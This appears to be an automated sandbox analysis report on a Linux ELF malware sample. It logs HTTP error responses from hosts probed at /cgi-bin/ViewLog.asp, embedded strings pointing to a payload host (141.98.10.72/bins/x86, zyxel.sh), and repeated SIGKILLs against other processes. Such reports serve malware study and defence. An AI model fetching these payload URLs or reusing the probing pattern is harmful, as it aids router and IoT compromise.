    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:30:14 GMTConnection: Close
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: uvlive/6.4.2 Rev13Connection:closeContent-Length: 0Access-Control-Allow-Origin: *
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 14 Feb 2024 08:30:20 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: keep-aliveX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: must-revalidate,no-cache,no-storeContent-Type: text/html; charset=ISO-8859-1Content-Length: 297Server: Jetty(9.2.25.v20180606)Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 32 3e 48 54 54 50 20 45 52 52 4f 52 3a 20 34 30 34 3c 2f 68 32 3e 0a 3c 70 3e 50 72 6f 62 6c 65 6d 20 61 63 63 65 73 73 69 6e 67 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 2e 20 52 65 61 73 6f 6e 3a 0a 3c 70 72 65 3e 20 20 20 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 72 65 3e 3c 2f 70 3e 0a 3c 68 72 20 2f 3e 3c 69 3e 3c 73 6d 61 6c 6c 3e 50 6f 77 65 72 65 64 20 62 79 20 4a 65 74 74 79 3a 2f 2f 3c 2f 73 6d 61 6c 6c 3e 3c 2f 69 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1"/><title>Error 404 </title></head><body><h2>HTTP ERROR: 404</h2><p>Problem accessing /cgi-bin/ViewLog.asp. Reason:<pre> Not Found</pre></p><hr /><i><small>Powered by Jetty://</small></i></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Web serverDate: Wed, 14 Feb 2024 08:30:28 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveX-Detail: 0x1210, insufficient security levelData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>Web server</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 09:14:35 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: application/json;charset=utf-8Content-Length: 0Server: Jetty(9.1.z-SNAPSHOT)
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0Date: Wed, 14 Feb 2024 08:30:33 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: must-revalidate,no-cache,no-storeContent-Type: text/html;charset=iso-8859-1Content-Length: 382Connection: closeServer: Jetty(9.4.45.v20220203)Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 32 3e 48 54 54 50 20 45 52 52 4f 52 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 74 61 62 6c 65 3e 0a 3c 74 72 3e 3c 74 68 3e 55 52 49 3a 3c 2f 74 68 3e 3c 74 64 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 54 41 54 55 53 3a 3c 2f 74 68 3e 3c 74 64 3e 34 30 34 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 4d 45 53 53 41 47 45 3a 3c 2f 74 68 3e 3c 74 64 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 45 52 56 4c 45 54 3a 3c 2f 74 68 3e 3c 74 64 3e 64 65 66 61 75 6c 74 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1"/><title>Error 404 Not Found</title></head><body><h2>HTTP ERROR 404 Not Found</h2><table><tr><th>URI:</th><td>/cgi-bin/ViewLog.asp</td></tr><tr><th>STATUS:</th><td>404</td></tr><tr><th>MESSAGE:</th><td>Not Found</td></tr><tr><th>SERVLET:</th><td>default</td></tr></table></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlAccept-Ranges: bytesSet-Cookie: HFS_SID_=0.226236936170608; path=/; HttpOnlyContent-Encoding: gzip
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 10:04:38 GMTServer: webCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: owsdcontent-type: text/htmlcontent-length: 38Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404</h1></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 09:44:19 GMTServer: webCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainDate: Wed, 14 Feb 2024 08:30:47 GMTContent-Length: 18Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: mini_httpd/1.19 19dec2003Date: Wed, 14 Feb 2024 08:30:52 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sConnection: closeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 6e 69 5f 68 74 74 70 64 2f 22 3e 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 31 39 20 31 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/mini_httpd/">mini_httpd/1.19 19dec2003</A></ADDRESS></BODY></HTML>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-type: text/htmlContent-Length: 0X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Frame-Options:SAMEORIGINSet-Cookie:Secure; HttpOnlyConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0Date: Wed, 14 Feb 2024 08:30:53 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:31:07 GMTConnection: Close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:31:07 GMTConnection: Close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 11:31:06 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 193Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open document: /cgi-bin/ViewLog.asp</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:31:14 GMTServer: Apache/2.4.43 (Win64)Content-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 04 Jan 1970 10:35:04 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: E6l0C6FObI.elfString found in binary or memory: http://141.98.10.72/bins/x86
    Source: E6l0C6FObI.elfString found in binary or memory: http://141.98.10.72/zyxel.sh;
    Source: E6l0C6FObI.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: E6l0C6FObI.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

    System Summary

    barindex
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 723, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 764, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 793, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 804, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 850, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 888, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 933, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 1431, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 1432, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 3047, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 3273, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 3275, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 3278, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 3368, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 3394, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 3456, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 3461, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 3465, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 3469, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 3475, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 5833, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 723, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 764, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 793, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 804, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 850, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 888, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 933, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 1431, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 1432, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 3044, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 3047, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 5830, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 5836, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 5837, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 5841, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 5847, result: successfulJump to behavior
